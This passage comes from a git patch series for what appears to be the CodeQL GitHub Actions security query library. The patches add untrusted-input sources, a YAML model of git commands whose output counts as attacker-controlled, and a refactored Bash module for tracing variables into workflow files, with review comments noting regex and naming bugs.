'.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') + GitHubEventPathSource() { + this.asExpr() = run.getScriptScalar() and + run.getACommand() = cmd and + cmd.matches("jq%") and + cmd.matches("%GITHUB_EVENT_PATH%") and + exists(string regexp | + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and + access_path = "github.event" + cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1) and + normalizeExpr(access_path).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + class GitHubEventJsonSource extends RemoteFlowSource { string flag; @@ -104,10 +186,12 @@ class MaDSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } } +abstract class FileSource extends RemoteFlowSource { } + /** * A downloaded artifact. */ -class ArtifactSource extends RemoteFlowSource { +class ArtifactSource extends RemoteFlowSource, FileSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } 
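Review bot: In `GitHubEventPathSource` the access path is taken with `cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1)`. Because the leading `.*` is greedy, this typically yields the second-to-last whitespace-delimited token, so it finds the jq filter only when the filter sits immediately before the file argument. For the quoted form listed in the examples, `jq -r '.issue.body' "$GITHUB_EVENT_PATH"`, the captured token still carries its quotes and `access_path` becomes `github.event'.issue.body'`; whether `normalizeExpr` strips them is not visible in this hunk, so a test case for the quoted form is worth adding. A command with further arguments after the file, or with the file before the filter, would capture the wrong token and the source would be missed without any signal. Consider passing the capture through `trimQuotes` and stating the assumed argument order in a QLDoc comment on the class, which currently has none.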
@@ -116,8 +200,27 @@ class ArtifactSource extends RemoteFlowSource { /** * A file from an untrusted checkout. */ -private class CheckoutSource extends RemoteFlowSource { - CheckoutSource() { this.asExpr() instanceof PRHeadCheckoutStep } +private class CheckoutSource extends RemoteFlowSource, FileSource { + CheckoutSource() { + // This shoould be: + // source instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + exists(Uses u | + this.asExpr() = u and + u.getCallee() = "actions/checkout" and + exists(u.getArgument("ref")) + ) + or + this.asExpr() instanceof GitMutableRefCheckout + or + this.asExpr() instanceof GitSHACheckout + or + this.asExpr() instanceof GhMutableRefCheckout + or + this.asExpr() instanceof GhSHACheckout + } override string getSourceType() { result = "artifact" } } diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_commands.yml new file mode 100644 index 00000000000..0d6c9e3bfa0 --- /dev/null +++ b/ql/lib/ext/config/untrusted_git_commands.yml 
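Review bot: The checkout disjunction added to `CheckoutSource` is a verbatim copy, comment included, of the one in `GitCommandSource` in the first hunk of this file, so the two lists can drift apart when a checkout class is added or renamed. A small private class or predicate holding the five alternatives, referenced from both places, would keep them in step. The `actions/checkout` arm holds for any step that sets a `ref` input, including a constant branch or tag, so it is broader than the PR-head checkout it stands in for; the comment should say that this over-approximation is intentional. The comment also has typos (`shoould`, `anc`, `non-Monolitic`; the CodeQL error concerns non-monotonic recursion).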
@@ -0,0 +1,32 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: untrustedGitCommandsDataModel
+ data:
+ # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r)
+ - [".*git\\b.*\\bdiff-tree\\b.*", "filename,multiline"]
+ # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore);
+ # CHANGES=$(git diff --name-only)
+ - [".*git\\b.*\\bdiff\\b.*", "filename,multiline"]
+ # COMMIT_MESSAGE=$(git log --format=%s -n 1)
+ - [".*git\\b.*\\blog\\b.*%s.*", "text,online"]
+ # COMMIT_MESSAGE=$(git log --format=%B -n 1)
+ - [".*git\\b.*\\blog\\b.*%B.*", "text,multiline"]
+ # COMMIT_MESSAGE=$(git log --format=oneline)
+ - [".*git\\b.*\\blog\\b.*oneline.*", "text,oneline"]
+ # COMMIT_MESSAGE=$(git show -s --format=%B)
+ # COMMIT_MESSAGE=$(git show -s --format=%s)
+ - [".*git\\b.*\\bshow\\b.*-s.*%s.*", "text,oneline"]
+ - [".*git\\b.*\\bshow\\b.*-s.*%B.*", "text,multiline"]
+ # AUTHOR=$(git log -1 --pretty=format:'%an')
+ - [".*git\\b.*\\blog\\b.*%an.*", "username,oneline"]
+ # AUTHOR=$(git show -s --pretty=%an)
+ - [".*git\\b.*\\bshow\\b.*%an.*", "username,oneline"]
+ # EMAIL=$(git log -1 --pretty=format:'%ae')
+ - [".*git\\b.*\\blog\\b.*%ae.*", "email,oneline"]
+ # EMAIL=$(git show -s --pretty=%ae)
+ - [".*git\\b.*\\bshow\\b.*%ae.*", "email,oneline"]
+ # BRANCH=$(git branch --show-current)
+ - [".*git\\b.*\\bbranch\\b.*\\b--show-current\\b.*", "branch,oneline"]
+ # BRANCH=$(git rev-parse --abbrev-ref HEAD)
+ - [".*git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b.*", "branch,oneline"]
From ee25f3565335dd4ee4e62188721adebb76a97b87 Mon Sep 17 00:00:00 2001
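Review bot: The last two rows put `\\b` directly before `--show-current` and `--abbrev-ref`; a word boundary cannot occur between the preceding space and a `-`, so these patterns will not match the commands shown in the comments above them (`git branch --show-current`, `git rev-parse --abbrev-ref HEAD`) and the branch-name sources go undetected. Dropping the leading boundary fixes it: `".*git\\b.*\\bbranch\\b.*--show-current\\b.*"` and `".*git\\b.*\\brev-parse\\b.*--abbrev-ref\\b.*"`. Separately, the `git log ... %s` row is flagged `"text,online"` where the other rows use `oneline`; it should be `"text,oneline"`.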
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:26 +0200 Subject: [PATCH 0576/1267] Refactor of Bash functions --- ql/lib/codeql/actions/Ast.qll | 16 + ql/lib/codeql/actions/Bash.qll | 364 ++++++++++++++++++ ql/lib/codeql/actions/Helper.qll | 239 +----------- ql/lib/codeql/actions/ast/internal/Ast.qll | 16 + .../security/ArgumentInjectionQuery.qll | 58 ++- .../security/ArtifactPoisoningQuery.qll | 18 + .../actions/security/CodeInjectionQuery.qll | 16 + .../security/EnvPathInjectionQuery.qll | 72 ++-- .../actions/security/EnvVarInjectionQuery.qll | 77 ++-- .../security/OutputClobberingQuery.qll | 134 ++++--- .../actions/security/PoisonableSteps.qll | 11 +- .../security/UntrustedCheckoutQuery.qll | 22 +- 12 files changed, 697 insertions(+), 346 deletions(-) create mode 100644 ql/lib/codeql/actions/Bash.qll diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 759bcf3f786..cc29ceffe53 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -315,6 +315,22 @@ class Run extends Step instanceof RunImpl { } predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + super.getAnEnvReachingGitHubOutputWrite(var, output_field) + } + + predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + super.getACmdReachingGitHubOutputWrite(cmd, output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + super.getAnEnvReachingGitHubEnvWrite(var, output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + super.getACmdReachingGitHubEnvWrite(cmd, output_field) + } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll new file mode 100644 index 00000000000..5907b601a46 --- /dev/null 
+++ b/ql/lib/codeql/actions/Bash.qll 
@@ -0,0 +1,364 @@ +private import codeql.actions.Ast +private import codeql.Locations +import codeql.actions.config.Config +private import codeql.actions.security.ControlChecks + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string pipeSeparator() { result = "|" } + + string splitSeparators() { + result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate isCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = "\\$\\(([^)]+)\\)" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = "`([^`]+)`" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate containsCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = ".*\\$\\(([^)]+)\\).*" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = ".*`([^`]+)`.*" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // 
${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[expr] + predicate containsParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = ".*\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = ".*\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) + } + + bindingset[script] + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = + 
"(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string var_name | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + 
"((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + var_name = trimQuotes(script.regexpCapture(regexp, 3)).regexpReplaceAll("<<\\s*(\\S+)", "") and + content = + var_name + "=$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + .regexpReplaceAll(">>.*GITHUB_(ENV|OUTPUT)(})?", "") + .trim() + ")" and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string first_line, string var_name | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + first_line = script.regexpCapture(regexp, 1).splitAt("\n", 0).trim() and + var_name = first_line.regexpCapture("echo\\s+('|\\\")?(.*)<<.*", 2) and + content = var_name + "=$(" + script.regexpCapture(regexp, 1).splitAt("\n").trim() + ")" and + not content.indexOf("EOF") > 0 and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + + bindingset[script] + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[script, file_var] + predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = 
"GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) + ) + } + + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + predicate fileToFileWrite(Run run, string file_var, string path) { + exists(string regexp, string stmt, string file_expr | + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + stmt = run.getAStmt() and + file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and + path = stmt.regexpCapture(regexp, 2) and + containsParameterExpansion(file_expr, file_var, _, _) + ) + } + + predicate fileToGitHubEnv(Run run, string path) { fileToFileWrite(run, "GITHUB_ENV", path) } + + predicate fileToGitHubOutput(Run run, string path) { fileToFileWrite(run, "GITHUB_OUTPUT", path) } + + predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run, "GITHUB_PATH", path) } + + bindingset[snippet] + predicate outputsPartialFileContent(Run run, string snippet) { + // e.g. 
+ // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + exists(int i, string line, string cmd | + run.getStmt(i) = line and + line.indexOf(snippet.regexpReplaceAll("^\\$\\(", "").regexpReplaceAll("\\)$", "")) > -1 and + run.getCommand(i) = cmd and + cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 + ) + } + + /** + * Holds if the Run scripts contains an access to an environment variable called `var` + * which value may get appended to the GITHUB_XXX special file + */ + predicate envReachingGitHubFileWrite(Run run, string var, string file_var, string field) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + run.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + run.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + run.getAWriteToGitHubPath(file_write_value) + ) and + envReachingRunExpr(run, var, file_write_value) + ) + } + + /** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. 
+ */ + bindingset[expr] + predicate envReachingRunExpr(Run run, string var, string expr) { + exists(string var2, string value2 | + // VAR2=${VAR:-default} (var2=value2) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + run.getAnAssignment(var2, value2) and + containsParameterExpansion(value2, var, _, _) and + containsParameterExpansion(expr, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=${VAR:-default}" >> $GITHUB_ENV (field, file_write_value) + containsParameterExpansion(expr, var, _, _) + } + + /** + * Holds if the Run scripts contains a command substitution (`cmd`) + * which output may get appended to the GITHUB_XXX special file + */ + predicate cmdReachingGitHubFileWrite(Run run, string cmd, string file_var, string field) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + run.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + run.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + run.getAWriteToGitHubPath(file_write_value) + ) and + ( + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + run.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(file_write_value, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(file_write_value, cmd) + ) + ) + } +} diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 688d62acbe1..ae4405a185b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
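Review bot: The `$VAR` alternative in `isParameterExpansion` and `containsParameterExpansion` uses `[a-zA-Z_][a-zA-Z0-9_]+`, which needs at least two characters, so a one-letter variable such as `$X` is only recognised when written `${X}`. These predicates now feed `envReachingRunExpr` and `cmdReachingGitHubFileWrite`, so the gap shows up as a missed flow rather than a cosmetic mismatch. Using `*` as the braced forms do fixes it: `regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]*)\\b"` and `regexp = ".*\\$([a-zA-Z_][a-zA-Z0-9_]*)\\b.*"`. Separately, `regexpCapture` returns the group of a single whole-string match, so with the greedy `.*` prefix each `contains…` alternative likely reports only the last expansion in `expr`; a test with two variables in one expression would confirm whether the earlier one is lost.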
@@ -1,7 +1,8 @@ private import codeql.actions.Ast private import codeql.Locations -import codeql.actions.config.Config private import codeql.actions.security.ControlChecks +import codeql.actions.config.Config +import codeql.actions.Bash bindingset[expr] string normalizeExpr(string expr) { 
@@ -82,239 +83,3 @@ string normalizePath(string path) { */ bindingset[subpath, path] predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } - -module Bash { - string stmtSeparator() { result = ";" } - - string commandSeparator() { result = ["&&", "||"] } - - string pipeSeparator() { result = "|" } - - string splitSeparators() { - result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() - } - - string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } - - string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } - - /** Checks if expr is a bash parameter expansion */ - bindingset[expr] - predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { - exists(string regexp | - // $VAR - regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${VAR} - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${!VAR} - regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 2) and - operator = expr.regexpCapture(regexp, 1) and - params = "" - or - // ${VAR}, ... 
- regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = expr.regexpCapture(regexp, 2) and - params = expr.regexpCapture(regexp, 3) - ) - } - - bindingset[raw_content] - predicate extractVariableAndValue(string raw_content, string key, string value) { - exists(string regexp, string content | content = trimQuotes(raw_content) | - regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and - key = trimQuotes(content.regexpCapture(regexp, 1)) and - value = trimQuotes(content.regexpCapture(regexp, 3)) - or - exists(string line | - line = content.splitAt("\n") and - regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and - key = trimQuotes(line.regexpCapture(regexp, 1)) and - value = trimQuotes(line.regexpCapture(regexp, 2)) - ) - ) - } - - bindingset[script] - predicate singleLineFileWrite( - string script, string cmd, string file, string content, string filters - ) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" and - content = script.regexpCapture(regexp, 2) - ) - } - - bindingset[script] - predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = script.regexpCapture(regexp, 4) and - value = trimQuotes(script.regexpCapture(regexp, 5)) - or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = "" and - value = trimQuotes(script.regexpCapture(regexp, 4)) - ) - } - - bindingset[script] - predicate heredocFileWrite(string script, string cmd, string file, 
string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and - content = script.regexpCapture(regexp, 6) and - filters = "" - or - regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 7)) and - filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 8) - ) - } - - bindingset[script] - predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + - "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and - content = - trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + - trimQuotes(script.regexpCapture(regexp, 6)) + "\n" + - trimQuotes(script.regexpCapture(regexp, 4)) and - cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" - ) - } - - bindingset[script] - predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^\\s*\\{\\s*[\r\n]" + - // - "(.*?)" + - // - "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and - content = - script - .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - cmd = "echo" and - filters = "" - ) - } - - bindingset[script] - predicate 
multiLineFileWrite( - string script, string cmd, string file, string content, string filters - ) { - heredocFileWrite(script, cmd, file, content, filters) - or - linesFileWrite(script, cmd, file, content, filters) - or - blockFileWrite(script, cmd, file, content, filters) - } - - bindingset[script, file_var] - predicate extractFileWrite(string script, string file_var, string content) { - // single line assignment - exists(string file_expr, string raw_content | - isBashParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and - content = trimQuotes(raw_content) - ) - or - // workflow command assignment - exists(string key, string value, string cmd | - ( - file_var = "GITHUB_ENV" and - cmd = "set-env" and - content = key + "=" + value - or - file_var = "GITHUB_OUTPUT" and - cmd = "set-output" and - content = key + "=" + value - or - file_var = "GITHUB_PATH" and - cmd = "add-path" and - content = value - ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) - ) - or - // multiline assignment - exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and - isBashParameterExpansion(file_expr, file_var, _, _) and - content = trimQuotes(raw_content) - ) - } - - /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ - bindingset[script, file_var] - predicate fileToFileWrite(string script, string file_var, string path) { - exists(string regexp, string line, string file_expr | - isBashParameterExpansion(file_expr, file_var, _, _) and - regexp = - "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + - "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - line = script.splitAt("\n") and - path = line.regexpCapture(regexp, 2) and - file_expr = trimQuotes(line.regexpCapture(regexp, 5)) - ) - } - - predicate fileToGitHubEnv(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_ENV", path) - 
} - - predicate fileToGitHubOutput(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) - } - - predicate fileToGitHubPath(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_PATH", path) - } - - bindingset[snippet] - predicate outputsPartialFileContent(Run run, string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - // Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - exists(int i, string line, string cmd | - run.getStmt(i) = line and - line.matches("%" + snippet + "%") and - run.getCommand(i) = cmd and - cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - ) - } -} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 30b57e361ab..a4b5778246a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1526,6 +1526,22 @@ class RunImpl extends StepImpl { predicate getAWriteToGitHubPath(string value) { Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + predicate 